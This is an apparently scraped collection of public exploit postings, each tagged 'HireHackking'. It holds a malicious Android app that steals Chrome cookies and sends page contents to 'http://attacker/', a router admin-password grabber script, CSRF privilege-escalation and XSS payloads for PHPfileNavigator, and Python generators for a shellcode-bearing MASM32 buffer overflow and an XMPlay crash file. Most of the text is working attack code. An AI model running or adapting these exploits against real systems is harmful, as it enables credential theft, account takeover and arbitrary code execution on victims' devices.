Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

// This is a part of malicious Android app.
  public void attack() {
    try {
      // let Chrome app load its Cookies file, so that Chrome app
      // automatically save it to /sdcard/Download/ directory.
      Intent intent = new Intent("android.intent.action.VIEW");
      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
      intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
      startActivity(intent);
  
      // wait a few seconds
      Thread.sleep(3000);
  
      // read the Cookie file (/sdcard/Download/Cookies.bin)
      FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
      ...
  }
HireHackking 
source: https://www.securityfocus.com/bid/55523/info
  
Google Chrome for Android is prone to multiple vulnerabilities.
  
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
  
Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

package jp.mbsd.terada.attackchrome1;
  
  import android.app.Activity;
  import android.os.Bundle;
  import android.util.Log;
  import android.content.Intent;
  import android.net.Uri;
  
  public class Main extends Activity {
    // TAG for logging.
    public final static String TAG = "attackchrome1";
  
    // Cookie file path of Chrome.
    public final static String CHROME_COOKIE_FILE_PATH =
      "/data/data/com.android.chrome/app_chrome/Default/Cookies";
  
    // Temporaly directory in which the symlink will be created.
    public final static String MY_TMP_DIR =
      "/data/data/jp.mbsd.terada.attackchrome1/tmp/";
  
    // The path of the Symlink (must have "html" extension)
    public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";
  
    @Override
    public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      doit();
    }
  
    // Method to invoke Chrome.
    public void invokeChrome(String url) {
      Intent intent = new Intent("android.intent.action.VIEW");
      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
      intent.setData(Uri.parse(url));
      startActivity(intent);
    }
  
    // Method to execute OS command.
    public void cmdexec(String[] cmd) {
      try {
        Runtime.getRuntime().exec(cmd);
      }
      catch (Exception e) {
        Log.e(TAG, e.getMessage());
      }
    }
  
    // Main method.
    public void doit() {
      try {
        // Create the symlink in this app's temporary directory.
        // The symlink points to Chrome's Cookie file.
        cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});
        cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});
        cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});
  
        Thread.sleep(1000);
  
        // Force Chrome to load attacker's web page to poison Chrome's Cookie file.
        // Suppose the web page sets a Cookie as below.
        //   x=<img><script>document.images[0].src='http://attacker/?'
        //     +encodeURIComponent(document.body.innerHTML)</script>;
        //     expires=Tue, 01-Jan-2030 00:00:00 GMT
        String url1 = "http://attacker/set_malicious_cookie.php";
        invokeChrome(url1);
  
        Thread.sleep(10000);
  
        // Force Chrome to load the symlink.
        // Chrome renders the content of the Cookie file as HTML.
        String url2 = "file://" + LINK_PATH;
        invokeChrome(url2);
      }
      catch (Exception e) {
        Log.e(TAG, e.getMessage());
      }
    }
  }
HireHackking 
#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################

# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
 
if [ "$1" != "" ]
then
	IP_ADDRESS="$1"
else
	echo "Usage : $0 IP_ADDRESS"
	exit 1
fi
 
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O -  | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812b.txt



Vendor:
=========================
pfn.sourceforge.net



Product:
=====================================================
PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application
to complete manage your files and folders.



Vulnerability Type:
=============================
Privilege Escalation



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
We can elevate privileges from that of a regular user
to an Admin level. In order for the attack
to succeed and escalate privileges to become Admin you need
know your ID  for the 'id_usuario' field when executing the
attack.

Tested using xampp-1.7.0


Exploit code(s):
===============

<!DOCTYPE>
<html>
<script>
function pwn(){
var e=document.getElementById('ELEVATO_DE_PRIVLOS')
e.submit()

}
</script>
<body onLoad="pwn()">


<!-- Escalate privs to that of Admin -->

    <form id="ELEVATO_DE_PRIVLOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php"
method="post">
    <input type="hidden" name="id_usuario" value="5" />
    <input type="text" id="nome" name="nome" value="b2" class="text"
tabindex="10" />
    <input type="text" id="usuario" name="usuario" value="b2" class="text"
tabindex="20" />
    <input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
    <input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
    <input type="text" id="email" name="email" value="b@b.com" class="text"
tabindex="50" />
    <input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
    <input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
    <select id="cambiar_datos" name="cambiar_datos" tabindex="75">
    <option value="1" >ON</option>
    <option value="0" selected="selected">OFF</option>
    </select>
    <select id="id_grupo" name="id_grupo" tabindex="80">
    <option value="1" selected="selected">Administrators</option>
    </select>
    <select id="admin" name="admin" tabindex="90">
    <option value="1" selected="selected">ON</option>
    <option value="0">OFF</option>
    </select>
    <select id="estado" name="estado" tabindex="100">
    <option value="1" selected="selected">ON</option>
    <option value="0" >OFF</option>
    </select>
    <input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
 class="checkbox" />
    </form>

</body>
</html>




Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] POST


Vulnerable Product:             [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s):        [+] id_grupo, admin, id_usuario


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812a.txt



Vendor:
================================
pfn.sourceforge.net



Product:
===================================
PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application
to complete manage your files and folders.



Vulnerability Type:
================================
CSRF add arbitrary user accounts



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
No CSRF token exists when creating user accounts, this allows
us to exploit the application and add arbitrary users The
?PHPSESSID= cookie used in URL is useless as we can just replace
the value with whatever.

e.g.

?PHPSESSID='inthesignofevil'

or just omit it all together makes no difference exploit will
still succeed. Next create our form POST and a self calling
Javascript function, then get a logged in user to click our
malicious linx or visit our webpage where they will be PWN3D.

Tested using xampp-1.7.0


Exploit code(s):
===============

<!DOCTYPE>
<html>

<!-- CSRF exploit add arbitrary user accounts with Admin privs -->
   <form id="USERIOS_EVILOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php?PHPSESSID=inthesignofevil"
method="post">
   <input type="hidden" name="id_usuario" value="" />
   <input type="text" id="nome" name="nome" value="hyp3rlinx" class="text"
tabindex="10" />
   <input type="text" id="usuario" name="usuario" value="hyp3rlinx"
class="text" tabindex="20" />
   <input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
   <input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
   <input type="text" id="email" name="email" value="hell@abysmalgod.com"
class="text" tabindex="50" />
   <input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
   <input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
   <select id="cambiar_datos" name="cambiar_datos" tabindex="75">
   <option value="1" >ON</option>
   <option value="0" selected="selected">OFF</option>
   </select>
   <select id="id_grupo" name="id_grupo" tabindex="80">
   <option value="0" selected="selected">Administrators</option>
   </select>
   <select id="admin" name="admin" tabindex="90">
   <option value="1" selected="selected">ON</option>
   <option value="0" >OFF</option>
   </select>
   <select id="estado" name="estado" tabindex="100">
   <option value="1" selected="selected">ON</option>
   <option value="0" >OFF</option>
   </select>
   <input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
 class="checkbox" />
  </form>

<script>

(function PWN3D(){
var e=document.getElementById('USERIOS_EVILOS')
e.submit()
})()

</script>

</body>
</html>


Disclosure Timeline:
=========================================================


Vendor Notification: August 8, 2015
August 12, 2015  : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] POST


Vulnerable Product:             [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s):        [+] id_usuario, id_grupo


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt



Vendor:
================================
pfn.sourceforge.net



Product:
===================================
PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application
to complete manage your files and folders.



Vulnerability Type:
=========================
Persistent & Reflected XSS



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form.
nome, usuario, email etc...

We can leverage existing CSRF vulnerability to update a victimz profile and
store malicious
XSS payload or an malicious user can inject there own payloads when
updating thier profilez
affecting other users and the security of the whole application.

Multiple reflected XSS exists as well for following PHP pages all with same
vulnerable
parameter 'dir' when issuing GET requests.

pfn-2.3.3 application seems to filter out <script> tags etc, but we can
bypass this using
<DIV onMouseMove= JS functions!.

navega.php

accion.php

preferencias.php


Tested using xampp-1.7.0


Exploit code(s):
===============

Persistent XSS:
---------------

POST URL:
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=

e.g.

Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email'
field
and click Accept button.

Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL
database
in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate
will happen for
other injected fields 'email & 'usuario'.


Reflected XSS:
--------------

1)
http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir=
" <DIV  onMouseMove= "alert(document.cookie) " </a>

2)
http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir=
" <DIV  onMouseMove= "alert(document.cookie) " </a>

3)
http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir=
" <DIV  onMouseMove= "alert(document.cookie) " </a>



Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure



Severity Level:
=========================================================
Medium



Description:
==========================================================


Request Method(s):              [+] POST / GET


Vulnerable Product:             [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s):        [+] nome, usuario, email, dir


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
#!/usr/bin/env python
#
# Exploit Title: MASM32 quick editor .QSE SEH Based Buffer Overflow (ASLR & SAFESEH bypass)
# Date: 2015-08-15
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: http://www.masm32.com/
# Software Link:   http://www.masm32.com/masmdl.htm
# Version: MASM32 11 qeditor 4.0g
# Tested on: Windows 7
#


from struct import pack
import sys

# 95 bytes Little Joke shellcode :p (shutdown)
# The shellcode must be printable
shellcode=""
shellcode+="\x89\xE3"
shellcode+="\xDB\xC2"
shellcode+="\xD9\x73\xF4"
shellcode+="\x5E"
shellcode+="VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"
shellcode+="THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"
shellcode+="QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"
shellcode+="CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"
shellcode+="NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA"


nop="\x90"*(1140-35)        # Destination of jump: qeditor add 8C opcode (mov in assembly) which crash qeditor
bypass="\xe2"               # with the nop (8C90 90909090) to bypass this we can use different opcodes.
endnop="\x90"*34            # The opcode e2 make the instruction 8ce2 (MOV DX,FS) and the execution flow
nop+=bypass+endnop          # can be continued
                             

junk="\x90"*(1704-95)       # Junk after shellcode
padding='\x62'*52           # 52 bytes available after SE Handler


jump="\xe9\x14\xf5\xff\xff" # jump to the nop
nseh="\xeb\xf9\x90\x90"     # jump to previous instruction
seh=pack("<I",0x00406a25)   # asciiprint: pop edi pop esi ret (C:\masm32\qeditor.exe)


payload=nop+shellcode+junk+jump+nseh+seh+padding

try:
 f=open("evil.qse","w")
 f.write(payload)
 f.close()
 print "Evil QSE script created!\nHack'n'Roll"
except:
 print "Can't create Evil QSE script :'("
 sys.exit(0)
HireHackking 
#!/usr/bin/env python
#
# Exploit Title: XMPlay .pls Local Crash poc
# Date: 2015-08-16
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: http://www.un4seen.com/
# Software Link:   http://www.un4seen.com/download.php?xmplay38
# Version: 3.8.1.12
# Tested on: Windows 7
#


# Stack Overflowing xmplay, but we can't 
# rewrite any register ou SE Handler

def generateCrash():
 crash="""[playlist]
numberofentries=1
file1="""

 crash+="pwned"*1000000
 return crash



try:
 f=open("xmplay.pls","w")
 f.write(generateCrash())
 f.close
 print "Evil xmplay.pls generated!"
except:
 print "I can't create file :/"